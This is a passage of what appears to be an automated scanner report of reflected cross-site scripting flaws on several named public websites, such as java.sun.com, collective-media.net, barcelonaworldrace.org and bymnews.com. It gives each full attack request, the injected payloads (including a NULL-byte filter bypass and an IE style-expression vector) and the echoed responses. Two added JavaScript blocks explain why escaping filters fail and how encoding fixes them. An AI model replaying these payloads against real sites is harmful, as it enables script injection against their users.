The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5475e"style%3d"x%3aexpression(alert(1))"7c7f389030d was submitted in the REST URL parameter 3. This input was echoed as 5475e"style="x:expression(alert(1))"7c7f389030d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin/5475e"style%3d"x%3aexpression(alert(1))"7c7f389030d/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:41:33 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin/5475e"style="x:expression(alert(1))"7c7f389030d/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

3.17. http://k.collective-media.net/cmadj/cm.martini/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c28e'-alert(1)-'ec11dfd28f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini5c28e'-alert(1)-'ec11dfd28f8/;sz=728x90;net=cm;ord=3271752524;ord1=707118;cmpgurl=http%253A//www.sailinganarchy.com/index_page1.php? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:30:32 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:31 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:31 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Thu, 27-Jan-2011 00:30:31 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Thu, 20-Jan-2011 08:30:31 GMT
Content-Length: 8065

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-95806145_1295483431","http://ib.adnxs.com/ptj?member=311&inv_code=cm.martini5c28e'-alert(1)-'ec11dfd28f8&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini5c28e%27-alert%281%29-%27ec11dfd28f8%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-958061
...[SNIP]...

3.18. http://k.collective-media.net/cmadj/cm.martini/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1943c'-alert(1)-'aa62200fb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini/;sz=1943c'-alert(1)-'aa62200fb HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; mmpg=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Thu, 20 Jan 2011 00:43:08 GMT
Content-Length: 7417
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10628852_1295484188","http://ib.adnxs.com/ptj?member=311&inv_code=cm.martini&size=1943c'-alert(1)-'aa62200fb&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10628852_1295484188%2C11d765b6a10b1b3%2Cnone%2Ccm.cm_aa_gn1-cm.sportsreg-cm.weath_l-cm.sports_m%3B%3Bcmw%3D
...[SNIP]...

3.19. http://www.americascupmedia.com/index.php [co parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bf0a'><script>alert(1)</script>4694b2364e4 was submitted in the co parameter. This input was echoed as 9bf0a\'><script>alert(1)</script>4694b2364e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&fn=folio&FolioID=83&co=19bf0a'><script>alert(1)</script>4694b2364e4 HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=586c6741fdb46ae80b334070c12e8931; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 156744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<input type='hidden' name='co' id='co' value='19bf0a\'><script>alert(1)</script>4694b2364e4'>
...[SNIP]...

3.20. http://www.americascupmedia.com/index.php [co parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea1fa"><script>alert(1)</script>8102d3b9511 was submitted in the co parameter. This input was echoed as ea1fa\"><script>alert(1)</script>8102d3b9511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
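The following is an added example, not code from the report or from americascupmedia.com. It covers 3.19 and 3.20 together: the response shows the quote echoed as `\'` and `\"`, which is addslashes-style escaping meant for SQL or PHP string literals. HTML has no backslash escape, so a browser still ends the attribute at the quote. The block puts that escaper, a script-tag blocklist, and real entity encoding through the same attribute template and tokenizes the result the way a browser would. Function names are hypothetical; the `style=expression` payload shape is the one the report uses in 3.36.

```javascript
// Added example; not code from the report or from americascupmedia.com.
// 3.19 and 3.20 show the co parameter echoed as 19bf0a\'>... and 1ea1fa\">...:
// the quote survived and only gained a backslash. That is addslashes-style
// escaping (meant for SQL or PHP string literals); HTML has no backslash
// escape, so the browser still ends the attribute at the quote. Function
// names are hypothetical and the tags are simplified stand-ins.

// PHP addslashes(): backslash before ' " \ and NUL. Not an HTML encoder.
function addslashes(s) {
  return String(s).replace(/[\\'"\0]/g, (c) => "\\" + c);
}

// A blocklist filter of the kind the IE style/expression vector in 3.36
// gets past: it only knows about script tags.
function stripScriptTags(s) {
  return String(s).replace(/<\/?script[^>]*>/gi, "");
}

// Entity-encode the five characters that matter in HTML text and in quoted
// attribute values. Safe for either quote style.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Emit a hidden input whose attribute values are delimited by `quote`.
function renderHiddenInput(value, escape, quote) {
  return "<input type=" + quote + "hidden" + quote + " name=" + quote + "co" + quote
    + " value=" + quote + escape(value) + quote + ">";
}

// Tokenize value=<quote>...<quote> the way a browser does: the attribute ends
// at the first matching quote, backslash or not. Whatever follows that quote
// is parsed as new attributes or new markup. Returns that trailing text, or
// null when the value stayed inside the attribute.
function attributeBreakout(html, quote) {
  const open = html.indexOf("value=" + quote) + ("value=" + quote).length;
  const close = html.indexOf(quote, open);
  const trailing = html.slice(close + 1);
  return trailing === ">" ? null : trailing;
}

// Constructed payloads with the same shapes as the report's (3.19, 3.20, 3.36).
const SQ_PAYLOAD = "19bf0a'><script>alert(1)</script>4694b2364e4";
const DQ_PAYLOAD = '1ea1fa"><script>alert(1)</script>8102d3b9511';
const EXPR_PAYLOAD = '324c3"style="x:expression(alert(1))"62d09b53079';

console.log(attributeBreakout(renderHiddenInput(SQ_PAYLOAD, addslashes, "'"), "'"));
// -> ><script>alert(1)</script>4694b2364e4'>   (markup now outside the attribute)
console.log(attributeBreakout(renderHiddenInput(EXPR_PAYLOAD, stripScriptTags, '"'), '"'));
// -> style="x:expression(alert(1))"62d09b53079">  (a new attribute, no tag needed)
console.log(attributeBreakout(renderHiddenInput(DQ_PAYLOAD, encodeHtml, '"'), '"'));
// -> null
```

The second case is why a blocklist on `<script` is not a fix for attribute-context reflection: closing the attribute is enough to add an event handler or, on the browser the report names in 3.36, a `style` expression, with no tag in the payload at all.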

Request

GET /index.php?lang=en&fn=folio&FolioID=83&co=1ea1fa"><script>alert(1)</script>8102d3b9511 HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=1a85d98a42aae84687229b91132260fb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 156744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<a href="AC-45--launched---,83,1ea1fa\"><script>alert(1)</script>8102d3b9511,en,fp.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('imgpetite','','./taiga/americascup/4pictos_vign_petite_on.gif',1)">
...[SNIP]...

3.21. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f3b5"><script>alert(1)</script>10ac75364ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite7f3b5"><script>alert(1)</script>10ac75364ee/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite7f3b5"><script>alert(1)</script>10ac75364ee/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

3.22. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd18a"><script>alert(1)</script>a1caa06401 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/brevesdd18a"><script>alert(1)</script>a1caa06401/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/brevesdd18a"><script>alert(1)</script>a1caa06401/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

3.23. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 43a5a--><script>alert(1)</script>e94251ccb77 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/actualite/breves/detail43a5a--><script>alert(1)</script>e94251ccb77/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:20 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web10; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<!-- /en/actualite/breves/ VS /en/actualite/breves/detail43a5a--><script>alert(1)</script>e94251ccb77/ =>
...[SNIP]...

3.24. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 971b0"><script>alert(1)</script>e6293bdbb82 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail971b0"><script>alert(1)</script>e6293bdbb82/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:20 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web10; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail971b0"><script>alert(1)</script>e6293bdbb82/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

3.25. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fb9"><script>alert(1)</script>bbeb226c99d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-807255fb9"><script>alert(1)</script>bbeb226c99d HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:22 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-807255fb9"><script>alert(1)</script>bbeb226c99d">
...[SNIP]...

3.26. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99434"><script>alert(1)</script>13356a1850f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?99434"><script>alert(1)</script>13356a1850f=1 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 20 Jan 2011 00:45:10 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?99434"><script>alert(1)</script>13356a1850f=1">
...[SNIP]...

3.27. http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beneteaucountdown.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a28b5"><script>alert(1)</script>18006edac7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a28b5\"><script>alert(1)</script>18006edac7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a28b5"><script>alert(1)</script>18006edac7b=1 HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=be1b4aa144ff8fe0e16b7f74697ace01; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Wed, 20-Jan-2010 00:45:09 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="BrochureRequest" action="index.php?a28b5\"><script>alert(1)</script>18006edac7b=1&amp;ccsForm=BrochureRequest" method="post">
...[SNIP]...

3.28. http://www.bymnews.com/news/newsList.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bymnews.com
Path:   /news/newsList.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00993e4"><script>alert(1)</script>a3764319929 was submitted in the cat parameter. This input was echoed as 993e4\"><script>alert(1)</script>a3764319929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
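The following is an added example, not code from the report, bymnews.com or any WAF vendor. It models the 3.28 bypass: a filter written in native code stops reading at the first NUL byte, so `%00` hides everything after it from the filter while the PHP application behind it prints the full value. It contrasts that filter with one that reads the whole string, and shows the fix the remediation text calls for: reject control characters and encode at output in the application itself. Function names are hypothetical and the link template is a stand-in.

```javascript
// Added example; not code from the report, bymnews.com or any WAF vendor.
// Models 3.28: a native-code filter treats a NUL byte as the end of the
// string, so everything after %00 is invisible to it, while the PHP
// application that echoes the parameter sees and prints the whole value.
// Function names are hypothetical.

const XSS_PATTERN = /<script|javascript:|on\w+\s*=/i;

// Simulated native filter: strlen()-style handling stops at the first NUL.
function nativeFilterBlocks(value) {
  const seen = value.split("\0")[0];
  return XSS_PATTERN.test(seen);
}

// Same rule applied to the full value: the bypass disappears.
function fullStringFilterBlocks(value) {
  return XSS_PATTERN.test(value);
}

// What the URL decoder hands to both the filter and the application.
function decodeParam(encoded) {
  return decodeURIComponent(encoded);
}

function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: trusts the front-end filter and echoes the raw value into a
// double-quoted attribute. Returns null when the filter "blocks".
function renderNextLink(cat, filter) {
  if (filter(cat)) return null;
  return '<a class="readonbym" href="newsList.php?cat=' + cat + '&amp;page=2">';
}

// Hardened: the fix lives in the application. Reject control characters
// (NUL included) at input, then entity-encode at output no matter what
// sits in front of the server.
function renderNextLinkSafe(cat) {
  if (/[\u0000-\u001f]/.test(cat)) return null;
  return '<a class="readonbym" href="newsList.php?cat=' + encodeHtml(cat) + '&amp;page=2">';
}

// Constructed requests with the same shape as the report's.
const PLAIN = decodeParam('2993e4"%3E%3Cscript%3Ealert(1)%3C/script%3Ea3764319929');
const WITH_NUL = decodeParam('2%00993e4"%3E%3Cscript%3Ealert(1)%3C/script%3Ea3764319929');

console.log(nativeFilterBlocks(PLAIN));                    // true  (blocked)
console.log(nativeFilterBlocks(WITH_NUL));                 // false (filter saw only "2")
console.log(renderNextLink(WITH_NUL, nativeFilterBlocks)); // markup containing <script>
console.log(renderNextLinkSafe(WITH_NUL));                 // null
```

Rejecting NUL at the application boundary is a cheap extra check, but it is the output encoding that closes the finding; the same encoder handles the no-NUL request the filter happened to catch.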

Request

GET /news/newsList.php?cat=2%00993e4"><script>alert(1)</script>a3764319929 HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 50802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<a class="readonbym" href="newsList.php?cat=2\0993e4\"><script>alert(1)</script>a3764319929&amp;page=2">
...[SNIP]...

3.29. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 325e2<script>alert(1)</script>bd2a273b0b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs325e2<script>alert(1)</script>bd2a273b0b1/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs325e2<script>alert(1)</script>bd2a273b0b1/009629399/apdxa.htm<br>
...[SNIP]...

3.30. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e9577--><script>alert(1)</script>c9731df4bc1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubse9577--><script>alert(1)</script>c9731df4bc1/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

